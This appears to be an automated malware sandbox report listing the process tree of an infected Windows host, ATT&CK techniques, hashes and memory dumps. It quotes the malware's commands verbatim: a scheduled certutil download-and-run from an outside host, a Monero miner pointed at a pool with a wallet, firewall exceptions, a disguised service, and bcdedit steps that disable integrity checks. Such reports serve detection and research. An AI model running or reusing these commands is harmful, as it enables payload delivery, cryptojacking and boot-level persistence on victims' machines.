C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3084 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:12⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\CB3B.exeC:\Users\Admin\AppData\Local\Temp\CB3B.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e2979542-8a63-43c8-9586-ca4e21e44702" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\CB3B.exe"C:\Users\Admin\AppData\Local\Temp\CB3B.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin1.exe"C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin2.exe"C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin.exe"C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\5.exe"C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\8d64f4f0-96c1-4080-9a88-aa28cb684210\5.exe & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\CD11.exeC:\Users\Admin\AppData\Local\Temp\CD11.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im CD11.exe /f & erase C:\Users\Admin\AppData\Local\Temp\CD11.exe & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im CD11.exe /f3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\D30D.exeC:\Users\Admin\AppData\Local\Temp\D30D.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D30D.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\D948.exeC:\Users\Admin\AppData\Local\Temp\D948.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\E2DE.exeC:\Users\Admin\AppData\Local\Temp\E2DE.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tieqplen\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wihvgqys.exe" C:\Windows\SysWOW64\tieqplen\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create tieqplen binPath= "C:\Windows\SysWOW64\tieqplen\wihvgqys.exe /d\"C:\Users\Admin\AppData\Local\Temp\E2DE.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description tieqplen "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start tieqplen2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\AppData\Local\Temp\E8FA.exeC:\Users\Admin\AppData\Local\Temp\E8FA.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\F85C.exeC:\Users\Admin\AppData\Local\Temp\F85C.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 24442⤵
- Program crash
-
C:\Windows\SysWOW64\tieqplen\wihvgqys.exeC:\Windows\SysWOW64\tieqplen\wihvgqys.exe /d"C:\Users\Admin\AppData\Local\Temp\E2DE.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵
-
C:\Users\Admin\AppData\Local\Temp\FF52.exeC:\Users\Admin\AppData\Local\Temp\FF52.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\FF52.exeC:\Users\Admin\AppData\Local\Temp\FF52.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\D5D.exeC:\Users\Admin\AppData\Local\Temp\D5D.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1B77.exeC:\Users\Admin\AppData\Local\Temp\1B77.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1B77.exe"C:\Users\Admin\AppData\Local\Temp\1B77.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\228D.exeC:\Users\Admin\AppData\Local\Temp\228D.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\6D14.exeC:\Users\Admin\AppData\Local\Temp\6D14.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\6D14.exeC:\Users\Admin\AppData\Local\Temp\6D14.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\713C.exeC:\Users\Admin\AppData\Local\Temp\713C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\A7CD.exeC:\Users\Admin\AppData\Local\Temp\A7CD.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 16882⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\AB2A.tmp.exeC:\Users\Admin\AppData\Local\Temp\AB2A.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\ABF6.exeC:\Users\Admin\AppData\Local\Temp\ABF6.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\AF04.tmp.exeC:\Users\Admin\AppData\Local\Temp\AF04.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B89A.tmp.exeC:\Users\Admin\AppData\Local\Temp\B89A.tmp.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
New Service
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Bootkit
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
5Virtualization/Sandbox Evasion
1Impair Defenses
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
936ec7ff5232e6201d0573c5a2f8d7d3
SHA13d6cbdbeeabe34b8cba99fce0cca6d02d05484f9
SHA25638f59e1d7081154071f77633e0ea0400dca38baebed4ff7235fdc86841d743fd
SHA512c2b26919c55df2467e6ecffbfba235d82fc5df684a028c684fc984d921a069f26b374736007380f48e17a2e5515d3c7169781993fd439e80df04fb13774ead91
-
\??\pipe\crashpad_3812_FSDUPTDYKRNCNAVHMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/196-579-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-562-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-596-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-592-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-595-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-593-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-591-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-590-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-560-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-588-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-587-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-586-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-585-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-581-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-584-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-582-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-583-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-580-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-589-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-597-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-572-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-576-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-575-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-574-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-573-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-577-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-571-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-570-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-569-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-568-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-567-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-594-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-566-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-565-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-564-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-563-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-578-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/196-561-0x000001F402AC0000-0x000001F402AC00F8-memory.dmpFilesize
248B
-
memory/208-42-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-39-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-58-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-53-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-56-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-55-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-54-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-52-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-51-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-49-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-46-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-45-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-50-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-48-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-47-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-44-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-43-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-41-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-40-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-12-0x0000000000000000-mapping.dmp
-
memory/208-57-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-38-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-29-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-28-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-59-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-31-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-30-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-27-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-26-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-32-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-25-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-24-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-23-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-33-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-22-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-34-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-35-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-36-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/208-37-0x0000026930760000-0x00000269307600F8-memory.dmpFilesize
248B
-
memory/212-468-0x0000000000000000-mapping.dmp
-
memory/636-212-0x0000000000000000-mapping.dmp
-
memory/848-831-0x0000020AAB250000-0x0000020AAB251000-memory.dmpFilesize
4KB
-
memory/848-850-0x0000020AAB2F0000-0x0000020AAB2F1000-memory.dmpFilesize
4KB
-
memory/848-823-0x0000020AAB2D0000-0x0000020AAB2D1000-memory.dmpFilesize
4KB
-
memory/848-854-0x0000020AAB270000-0x0000020AAB271000-memory.dmpFilesize
4KB
-
memory/904-2-0x0000000000000000-mapping.dmp
-
memory/940-518-0x0000000004A20000-0x0000000004A21000-memory.dmpFilesize
4KB
-
memory/1000-686-0x0000000000400000-0x0000000000415000-memory.dmpFilesize
84KB
-
memory/1000-685-0x0000000000530000-0x0000000000543000-memory.dmpFilesize
76KB
-
memory/1000-684-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/1652-848-0x000001FD0E880000-0x000001FD0E881000-memory.dmpFilesize
4KB
-
memory/1652-818-0x000001FD0DD70000-0x000001FD0DD71000-memory.dmpFilesize
4KB
-
memory/1728-769-0x0000000002600000-0x00000000026F1000-memory.dmpFilesize
964KB
-
memory/1996-437-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-449-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-423-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-435-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-438-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-440-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-442-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
memory/1996-444-0x000001BF34840000-0x000001BF348400F8-memory.dmpFilesize
248B
-
